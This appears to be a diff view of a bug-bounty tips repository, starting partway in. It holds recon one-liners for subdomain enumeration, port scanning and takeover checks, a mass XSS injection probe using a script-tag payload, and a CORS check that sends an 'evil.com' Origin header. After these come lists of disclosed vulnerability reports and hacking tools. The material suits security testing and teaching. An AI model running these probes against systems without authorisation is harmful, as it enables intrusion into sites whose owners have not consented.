     242 +curl "https://recon.dev/api/search?key=apikey&domain=HOST" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u | httpx -silent
     243 +```
     244 + 
     245 +#### Subdomain Bruteforcer with FFUF
     246 + 
     247 +> @GochaOqradze
     248 + 
     249 +```bash
     250 +ffuf -u https://FUZZ.HOST -w FILE.txt -v | grep "| URL |" | awk '{print $4}'
     251 +```
     252 + 
     253 +#### Find Allocated IP Ranges for ASN from IP Address
     254 + 
     255 +> wains.be
     256 + 
     257 +```bash
     258 +whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net IP | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n
     259 +```
     260 + 
     261 +#### Extract IPs from a File
     262 + 
     263 +> @emenalf
     264 + 
     265 +```bash
     266 +grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt
     267 +```
     268 + 
     269 +#### Ports Scan without CloudFlare
     270 + 
     271 +> @dwisiswant0
     272 + 
     273 +```bash
     274 +subfinder -silent -d HOST | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe
     275 +```
     276 + 
     277 +#### Create Custom Wordlists
     278 + 
     279 +> @tomnomnom
     280 + 
     281 +```bash
     282 +gau HOST | unfurl -u keys | tee -a FILE1.txt; gau HOST | unfurl -u paths | tee -a FILE2.txt; sed 's#/#\n#g' FILE2.txt | sort -u | tee -a FILE1.txt | sort -u; rm FILE2.txt | sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.wolf\|\.bmp//g' FILE1.txt
     283 +```
     284 + 
     285 +```bash
     286 +cat HOSTS.txt | httprobe | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a FILE.txt
     287 +```
     288 + 
     289 +#### Extracts Juicy Informations
     290 + 
     291 +> @Prial Islam Khan
     292 + 
     293 +```bash
     294 +for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a OUT.txt ;done
     295 +```
     296 + 
     297 +#### Find Subdomains TakeOver
     298 + 
     299 +> @hahwul
     300 + 
     301 +```bash
     302 +subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ;
     303 +```
     304 + 
     305 +#### Dump Custom URLs from ParamSpider
     306 + 
     307 +> @hahwul
     308 + 
     309 +```bash
     310 +cat HOSTS.txt | xargs -I % python3 paramspider.py -l high -o ./OUT/% -d %;
     311 +```
     312 + 
     313 +#### URLs Probing with cURL + Parallel
     314 + 
     315 +> @akita\_zen
     316 + 
     317 +```bash
     318 +cat HOSTS.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk
     319 +```
     320 + 
     321 +#### Dump In-scope Assets from `chaos-bugbounty-list`
     322 + 
     323 +> @dwisiswant0
     324 + 
     325 +```bash
     326 +curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value'
     327 +```
     328 + 
     329 +#### Dump In-scope Assets from `bounty-targets-data`
     330 + 
     331 +> @dwisiswant0
     332 + 
     333 +**HackerOne Programs**
     334 + 
     335 +```bash
     336 +curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'
     337 +```
     338 + 
     339 +**BugCrowd Programs**
     340 + 
     341 +```bash
     342 +curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
     343 +```
     344 + 
     345 +**Intigriti Programs**
     346 + 
     347 +```bash
     348 +curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'
     349 +```
     350 + 
     351 +**YesWeHack Programs**
     352 + 
     353 +```bash
     354 +curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/yeswehack_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
     355 +```
     356 + 
     357 +**HackenProof Programs**
     358 + 
     359 +```bash
     360 +curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/hackenproof_data.json | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'
     361 +```
     362 + 
     363 +**Federacy Programs**
     364 + 
     365 +```bash
     366 +curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
     367 +```
     368 + 
     369 +#### Dump URLs from sitemap.xml
     370 + 
     371 +> @healthyoutlet
     372 + 
     373 +```bash
     374 +curl -s http://HOST/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'
     375 +```
     376 + 
     377 +#### Pure Bash Linkfinder
     378 + 
     379 +> @ntrzz
     380 + 
     381 +```bash
     382 +curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > FILE.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < FILE.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf FILE.txt
     383 +```
     384 + 
     385 +#### Extract Endpoints from swagger.json
     386 + 
     387 +> @zer0pwn
     388 + 
     389 +```bash
     390 +curl -s https://HOST/v2/swagger.json | jq '.paths | keys[]'
     391 +```
     392 + 
     393 +#### CORS Misconfiguration
     394 + 
     395 +> @manas\_hunter
     396 + 
     397 +```bash
     398 +site="URL"; gau "$site" | while read url; do target=$(curl -sIH "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found] echo $url; else echo Nothing on "$url"; fi; done
     399 +```
     400 + 
     401 +#### Find Hidden Servers and/or Admin Panels
     402 + 
     403 +> @rez0\_\_
     404 + 
     405 +```bash
     406 +ffuf -c -u URL -H "Host: FUZZ" -w FILE.txt
     407 +```
     408 + 
     409 +#### Recon Using api.recon.dev
     410 + 
     411 +> @z0idsec
     412 + 
     413 +```bash
     414 +curl -s -w "\n%{http_code}" https://api.recon.dev/search?domain=HOST | jg .[].domain
     415 +```
     416 + 
     417 +#### Find Live Host/Domain/Assets
     418 + 
     419 +> @_YashGoti_
     420 + 
     421 +```bash
     422 +subfinder -d HOST -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
     423 +```
     424 + 
     425 +#### XSS without gf
     426 + 
     427 +> @HacktifyS
     428 + 
     429 +```bash
     430 +waybackurls HOST | grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -sk --path-as-is "$host" | grep -qs "<script>alert(1)</script>" && echo "$host is vulnerable"; done
     431 +```
     432 + 
     433 +#### Get Subdomains from IPs
     434 + 
     435 +> @laughface809
     436 + 
     437 +```bash
     438 +python3 hosthunter.py HOSTS.txt > OUT.txt
     439 +```
     440 + 
     441 +#### Gather Domains from Content-Security-Policy
     442 + 
     443 +> @geeknik
     444 + 
     445 +```bash
     446 +curl -vs URL --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" | sed -e '/\./!d' -e '/[^A-Za-z0-9._-]/d' -e 's/^\.//' | sort -u
     447 +```
     448 + 
     449 +#### Nmap IP:PORT Parser Piped to HTTPX
     450 + 
     451 +> @dwisiswant0
     452 + 
     453 +```bash
     454 +nmap -v0 HOST -oX /dev/stdout | jc --xml -p | jq -r '.nmaprun.host | (.address["@addr"] + ":" + .ports.port[]["@portid"])' | httpx --silent
     455 +```
     456 + 
  • ■ ■ ■ ■ ■ ■
    overview/recon-tips/resources/README.md
     1 +# Resources
     2 + 
     3 +## <mark style="color:green;">**Bug Bounty Resources & Disclosed Reports: A Valuable Collection of Insights 📝**</mark>
     4 + 
     5 +* [Starting out](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Starting-Out)
     6 +* [Books](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Books)
     7 +* [Blogs](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Blogs)
     8 +* [Training Platforms](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Training-Platforms)
     9 +* [Web Security](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Web-Security)
     10 +* [Recon](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Recon)
     11 +* [XSS](https://github.com/HolyBugx/HolyTips/tree/main/Resources#XSS)
     12 +* [CSRF](https://github.com/HolyBugx/HolyTips/tree/main/Resources#CSRF)
     13 +* [IDOR](https://github.com/HolyBugx/HolyTips/tree/main/Resources#IDOR)
     14 +* [Open Redirect](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Open-Redirect)
     15 +* [Race Condition](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Race-Condition)
     16 +* [Subdomain Takeover](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Subdomain-Takeover)
     17 +* [SSRF](https://github.com/HolyBugx/HolyTips/tree/main/Resources#SSRF)
     18 +* [XXE](https://github.com/HolyBugx/HolyTips/tree/main/Resources#XXE)
     19 +* [SQLi](https://github.com/HolyBugx/HolyTips/tree/main/Resources#SQLi)
     20 +* [Misc](https://github.com/HolyBugx/HolyTips/tree/main/Resources#Misc)
     21 + 
     22 +***
     23 + 
     24 +### <mark style="color:green;">Starting-Out</mark>
     25 + 
     26 +* [PortSwigger's Learning Path](https://portswigger.net/web-security/learning-path)
     27 +* [Cobalt Vulnerability Wiki](https://cobalt.io/vulnerability-wiki/)
     28 +* [OWASP Top 10 Web Training](https://application.security/free/owasp-top-10)
     29 +* [OWASP Top 10 API Training](https://application.security/free/owasp-top-10-API)
     30 +* [Web Security Course](https://web.stanford.edu/class/cs253/)
     31 + 
     32 +***
     33 + 
     34 +### <mark style="color:green;">Books</mark>
     35 + 
     36 +* [The Web Application Hacker's Handbook, 2nd Edition](https://www.oreilly.com/library/view/the-web-application/9781118026472)
     37 +* [Web Hacking 101](https://leanpub.com/web-hacking-101)
     38 +* [Real-World Bug Hunting](https://www.amazon.com/gp/product/B072SQZ2LG)
     39 +* [The Tangled Web](https://www.amazon.com/Tangled-Web-Securing-Modern-Applications/dp/1593273886)
     40 +* [The Hacker Playbook 2](https://www.amazon.com/Hacker-Playbook-Practical-Penetration-Testing-ebook/dp/B01072WJZE)
     41 +* [The Hacker Playbook 3](https://www.amazon.com/Hacker-Playbook-Practical-Penetration-Testing-ebook/dp/B07CSPFYZ2)
     42 + 
     43 +***
     44 + 
     45 +### <mark style="color:green;">Blogs</mark>
     46 + 
     47 +* [Assetnote](https://blog.assetnote.io/)
     48 +* [Secjuice](https://www.secjuice.com/)
     49 +* [James Kettle](https://skeletonscribe.net/)
     50 +* [Orange Tsai](https://blog.orange.tw/)
     51 +* [Sam Curry](https://samcurry.net/blog/)
     52 +* [Patrik Hudak](https://0xpatrik.com/)
     53 +* [Honoki](https://honoki.net/)
     54 + 
     55 +***
     56 + 
     57 +### <mark style="color:green;">Training-Platforms</mark>
     58 + 
     59 +* [BugBountyHunter.com](https://bugbountyhunter.com)
     60 +* [PentesterLab](https://pentesterlab.com)
     61 +* [HackTheBox](https://www.hackthebox.eu/home)
     62 +* [TryHackMe](https://tryhackme.com)
     63 +* [Rootme](https://www.root-me.org/?lang=en)
     64 +* [PicoCTF](https://picoctf.org)
     65 +* [GoogleCTF](https://capturetheflag.withgoogle.com)
     66 + 
     67 +***
     68 + 
     69 +### <mark style="color:green;">Web-Security</mark>
     70 + 
     71 +* [Finding The Origin IP Behind CDNs](https://infosecwriteups.com/finding-the-origin-ip-behind-cdns-37cd18d5275)
     72 +* [Accessing cross-site data using JSONP](https://www.sjoerdlangkemper.nl/2019/01/02/jsonp/)
     73 +* [Hacking the SOP](https://medium.com/swlh/hacking-the-same-origin-policy-f9f49ad592fc)
     74 +* [LocalStorage vs Cookie XSS](https://academind.com/tutorials/localstorage-vs-cookies-xss/)
     75 +* [Cross-Site script inclusion](https://www.scip.ch/en/?labs.20160414)
     76 +* [How to Hunt Bugs in SAML; a Methodology - Part I](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/)
     77 +* [How to Hunt Bugs in SAML; a Methodology - Part II](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/)
     78 +* [How to Hunt Bugs in SAML; a Methodology - Part III](https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-part-three/)
     79 +* [SAML Attack Surface](https://github.com/kelbyludwig/saml-attack-surface)
     80 + 
     81 +***
     82 + 
     83 +### <mark style="color:green;">Recon</mark>
     84 + 
     85 +* [The Bug Hunter's Methodology v4.0 - Recon Edition](https://youtu.be/p4JgIu1mceI)
     86 +* [Fundamentals of Bug Bounty Recon](https://youtu.be/DABPWQ40yb0)
     87 +* [How To Do Recon: Introduction to Recon](https://youtu.be/o8L2nweiF1s)
     88 +* [Just another Recon Guide for Pentesters and Bug Bounty Hunters](https://www.offensity.com/de/blog/just-another-recon-guide-pentesters-and-bug-bounty-hunters/)
     89 +* [The Best Bug Bounty Recon Methodology](https://securib.ee/beelog/the-best-bug-bounty-recon-methodology/)
     90 +* [The Art of Subdomain Enumeration](https://appsecco.com/books/subdomain-enumeration/)
     91 + 
     92 +***
     93 + 
     94 +### <mark style="color:green;">XSS</mark>
     95 + 
     96 +* [Instagram Reflected XSS](https://ysamm.com/?p=695)
     97 +* [XSS in Facebook CDN](https://ysamm.com/?p=632)
     98 +* [XSS on forums.oculusvr.com](https://ysamm.com/?p=525)
     99 +* [Persistent DOM-based XSS in https://help.twitter.com via localStorage](https://hackerone.com/reports/297968)
     100 +* [DOM XSS on app.starbucks.com via ReturnUrl](https://hackerone.com/reports/526265)
     101 +* [XSS in steam react chat client](https://hackerone.com/reports/409850)
     102 +* [XSS while logging using Google](https://hackerone.com/reports/691611)
     103 +* [Stored XSS in RDoc wiki pages](https://hackerone.com/reports/662287)
     104 + 
     105 +***
     106 + 
     107 +### <mark style="color:green;">CSR</mark>F
     108 + 
     109 +* [CSRF on connecting Paypal as Payment Provider](https://hackerone.com/reports/807924)
     110 +* [CSRF on Periscope Web OAuth authorization endpoint](https://hackerone.com/reports/215381)
     111 +* [CSRF combined with IDOR within Document Converter exposes files](https://hackerone.com/reports/398316)
     112 +* [CSRF in all API endpoints when authenticated using HTTP Authentication](https://hackerone.com/reports/195156)
     113 +* [The mass CSRFing of \*.google.com/\* products.](http://www.missoumsai.com/google-csrfs.html)
     114 +* [Facebook CSRF bug which lead to Instagram Partial account takeover.](https://ysamm.com/?p=379)
     115 +* [Media deletion CSRF vulnerability on Instagram](https://blog.darabi.me/2019/12/instagram-delete-media-csrf.html)
     116 +* [Facebook CSRF protection bypass which leads to Account Takeover](https://ysamm.com/?p=185)
     117 + 
     118 +***
     119 + 
     120 +### <mark style="color:green;">IDOR</mark>
     121 + 
     122 +* [IDOR bug to See hidden slowvote of any user even when you dont have access right](https://hackerone.com/reports/661978)
     123 +* [IDOR allow access to payments data of any user](https://hackerone.com/reports/751577)
     124 +* [IDOR Causing Deletion of any account](https://hackerone.com/reports/156537)
     125 +* [IDOR allow to extract all registered email](https://hackerone.com/reports/302485)
     126 +* [Another image removal vulnerability on Facebook](https://blog.darabi.me/2020/06/image-removal-vulnerability-on-facebook.html)
     127 +* [Gsuite Hangouts Chat 5k IDOR](https://secreltyhiddenwriteups.blogspot.com/2018/07/gsuite-hangouts-chat-5k-idor.html)
     128 +* [How I pwned a company using IDOR and Blind XSS](https://www.ansariosama.com/2017/11/how-i-pwned-company-using-idor-blind-xss.html)
     129 +* [Disclose Private Dashboard Chart's name and data in Facebook Analytics](https://bugreader.com/jubabaghdad@disclose-private-dashboard-charts-name-and-data-in-facebook-analytics-184)
     130 + 
     131 +***
     132 + 
     133 +### <mark style="color:green;">Open-Redirect</mark>
     134 + 
     135 +* [Open Redirects that matter](https://sites.google.com/site/bughunteruniversity/best-reports/openredirectsthatmatter)
     136 +* [XSS and Open Redirect on MoPub Login](https://hackerone.com/reports/683298)
     137 +* [XSS and Open Rredirect on supporthiring.shopify.com](https://hackerone.com/reports/158434)
     138 +* [Open Redirect in secure.showmax.com](https://medium.com/@ahmadbrainworks/bug-bounty-how-i-earned-550-in-less-than-5-minutes-open-redirect-chained-with-rxss-8957979070e5)
     139 +* [Open Redirect on streamlabs.com](https://hackerone.com/reports/978680)
     140 +* [Open Redirect on "Language change"](https://hackerone.com/reports/52035)
     141 +* [Open Redirect idp.fr.cloud.gov](https://hackerone.com/reports/387007)
     142 +* [Airbnb chaining third party open redirect into SSRF via liveperson chat](https://buer.haus/2017/03/09/airbnb-chaining-third-party-open-redirect-into-server-side-request-forgery-ssrf-via-liveperson-chat/)
     143 +* [Oauth authentication bypass on airbnb acquistion using wierd 1 char open redirect](https://xpoc.pro/oauth-authentication-bypass-on-airbnb-acquisition-using-weird-1-char-open-redirect/)
     144 + 
     145 +***
     146 + 
     147 +### <mark style="color:green;">Race-Condition</mark>
     148 + 
     149 +* [Race Condition in performing retest allows duplicated payments](https://hackerone.com/reports/429026)
     150 +* [Race Conditions in OAuth 2 API implementations](https://hackerone.com/reports/55140)
     151 +* [Race Condition in Flash workers may cause an exploitable double free](https://hackerone.com/reports/37240)
     152 +* [Exploiting a Race condition vulnerabililty](https://medium.com/@vincenz/exploiting-a-race-condition-vulnerability-3f2cb387a72)
     153 +* [Race Condition leads to undeletable group member](https://hackerone.com/reports/604534)
     154 +* [Race Condition on web](https://www.josipfranjkovic.com/blog/race-conditions-on-web)
     155 +* [Race Condition in account survey](https://hackerone.com/reports/165570)
     156 +* [Race Condition at create new Location](https://hackerone.com/reports/413759)
     157 + 
     158 +***
     159 + 
     160 +### <mark style="color:green;">Subdomain-Takeover</mark>
     161 + 
     162 +* [Subdomain Takeover to Authentication bypass](https://hackerone.com/reports/335330)
     163 +* [Subdomain Takeover on happymondays.starbucks.com due to non-used AWS S3 DNS record](https://hackerone.com/reports/186766)
     164 +* [Subdomain Takeover on wfmnarptpc.starbucks.com](https://hackerone.com/reports/388622)
     165 +* [Subdomain Takeover on svcgatewaydevus.starbucks.com and svcgatewayloadus.starbucks.com](https://hackerone.com/reports/383564)
     166 +* [Subdomain Takeover: new level](https://medium.com/bugbountywriteup/subdomain-takeover-new-level-43f88b55e0b2)
     167 +* [Subdomain Takeover on svcardproxydevus.starbucks.com](https://hackerone.com/reports/380158)
     168 +* [Subdomain Takeover on blog.greenhouse.io pointing to Hubspot](https://hackerone.com/reports/38007)
     169 +* [Subdomain Takeover on openapi.starbucks.com](https://hackerone.com/reports/241503)
     170 + 
     171 +***
     172 + 
     173 +### <mark style="color:green;">SSRF</mark>
     174 + 
     175 +* [SSRF in Exchange leads to ROOT access in all instances](https://hackerone.com/reports/341876)
     176 +* [SSRF using Javascript allows to exfill data from Google Metadata](https://hackerone.com/reports/530974)
     177 +* [SSRF in Google cloud platform stackdriver](https://ngailong.wordpress.com/2019/12/19/google-vrp-ssrf-in-google-cloud-platform-stackdriver/)
     178 +* [SSRF to ROOT Access](https://hackerone.com/reports/341876)
     179 +* [SSRF reading local files from downnotifier server](https://www.openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/)
     180 +* [Facebook SSRF](https://medium.com/@amineaboud/10000-facebook-ssrf-bug-bounty-402bd21e58e5)
     181 +* [31k$ SSRF in Google Cloud Monitoring led to metadata exposure](https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html)
     182 +* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
     183 + 
     184 +***
     185 + 
     186 +### <mark style="color:green;">XXE</mark>
     187 + 
     188 +* [XXE at ecjobs.starbucks.com.cn](https://hackerone.com/reports/500515)
     189 +* [XXE on sms-be-vip.twitter.com in SXMP Processor](https://hackerone.com/reports/248668)
     190 +* [XXE and SSRF on webmaster.mail.ru](https://hackerone.com/reports/12583)
     191 +* [XXE in Site Audit function exposing file and directory contents](https://hackerone.com/reports/312543)
     192 +* [Blind OOB XXE on ubermovement.com](https://hackerone.com/reports/154096)
     193 +* [XXE over which leads to RCE](https://hackerone.com/reports/55431)
     194 +* [LFI and SSRF via XXE in emblem editor](https://hackerone.com/reports/347139)
     195 +* [Non-production Open Database In Combination With XXE Leads To SSRF](https://hackerone.com/reports/742808)
     196 + 
     197 +***
     198 + 
     199 +### <mark style="color:green;">SQLi</mark>
     200 + 
     201 +* [Bypassing a crappy WAF to exploit a blind SQLI](https://robinverton.de/blog/2019/08/25/bug-bounty-bypassing-a-crappy-waf-to-exploit-a-blind-sql-injection/)
     202 +* [Magix Bug Bounty: magix.com (RCE, SQLi) and xara.com (LFI, XSS)](https://www.rcesecurity.com/2014/04/magix-bug-bounty-magix-com-rce-sqli-and-xara-com-lfi-xss/)
     203 +* [Tesla Motors blind SQLI](https://bitquark.co.uk/blog/2014/02/23/tesla\_motors\_blind\_sql\_injection)
     204 +* [Blind SQL Injection on windows10.hi-tech.mail.ru](https://hackerone.com/reports/786044)
     205 +* [Blind SQLi leading to RCE, from Unauthenticated access to a test API Webservice](https://hackerone.com/reports/592400)
     206 +* [Step by Step Exploiting SQL Injection in Oculus](https://josipfranjkovic.blogspot.com/2014/09/step-by-step-exploiting-sql-injection.html)
     207 +* [SQL Injection in lapsuudenturva](https://hackerone.com/reports/191146)
     208 +* [SQL Injection Root Access tw.yahoo.com](https://buer.haus/2015/01/15/yahoo-root-access-sql-injection-tw-yahoo-com/)
     209 + 
  • ■ ■ ■ ■ ■ ■
    overview/recon-tips/resources/introducing-20-web-application-hacking-tools.md
     1 +# Introducing 20 web-application hacking tools🔥🤩🌵
     2 + 
     3 +Here are some powerful tools for various security testing purposes, including vulnerability assessment, reconnaissance, and exploitation:
     4 + 
     5 +1. [Burp Suite](https://portswigger.net/burp) - A comprehensive web application security framework.
     6 +2. [ZAP Proxy](https://www.zaproxy.org/) - An open-source web application security scanner and proxy.
     7 +3. [Dirsearch](https://github.com/maurosoria/dirsearch) - A tool for brute-forcing directories and files on web servers.
     8 +4. [Nmap](https://nmap.org/) - A versatile and widely-used port scanning and network exploration tool.
     9 +5. [Sublist3r](https://github.com/aboul3la/Sublist3r) - A subdomain discovery tool that enumerates subdomains using multiple search engines.
     10 +6. [Amass](https://github.com/OWASP/Amass) - A versatile subdomain enumeration and information gathering tool.
     11 +7. [SQLmap](http://sqlmap.org/) - An automatic SQL injection and database takeover tool.
     12 +8. [Metasploit](https://www.metasploit.com/) - A powerful framework for developing, testing, and executing exploits.
     13 +9. [WPscan](https://wpscan.com/) - A WordPress vulnerability scanner and exploitation tool.
     14 +10. [Nikto](https://cirt.net/Nikto2) - A web server scanner that identifies potential vulnerabilities.
     15 +11. [HTTPX](https://github.com/projectdiscovery/httpx) - A fast and multi-purpose HTTP probing tool.
     16 +12. [Nuclei](https://nuclei.projectdiscovery.io/) - A fast and customizable vulnerability scanner that uses YAML-based templates.
     17 +13. [FFUF](https://github.com/ffuf/ffuf) - A fast web fuzzer used for discovering hidden files and directories.
     18 +14. [Subfinder](https://github.com/projectdiscovery/subfinder) - A subdomain discovery tool that uses passive online sources.
     19 +15. [Masscan](https://github.com/robertdavidgraham/masscan) - A high-speed IP and port scanner.
     20 +16. [Lazy Recon](https://github.com/nahamsec/lazyrecon) - A script that automates various subdomain discovery techniques.
     21 +17. [XSS Hunter](https://xsshunter.com/) - A platform for finding and tracking blind Cross-Site Scripting (XSS) vulnerabilities.
     22 +18. [Aquatone](https://github.com/michenriksen/aquatone) - A tool for performing HTTP-based reconnaissance and screenshots.
     23 +19. [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - A tool to discover endpoints and links in JavaScript files.
     24 +20. [JS-Scan](https://github.com/dark-warlord14/JS-Scan) - A tool for discovering endpoints in JavaScript files.
     25 + 
     26 +These tools offer a range of functionalities to support your security testing activities. Remember to use them responsibly and in compliance with ethical guidelines.
     27 + 
     28 +<mark style="color:red;">Note: The provided links will redirect you to the respective tool's official website or GitHub repository for more information and downloads.</mark>
     29 + 
     30 +<mark style="color:green;">#bugbounty #bugbountytips #cybersecurity</mark>
     31 + 
Please wait...
Page is in error, reload to recover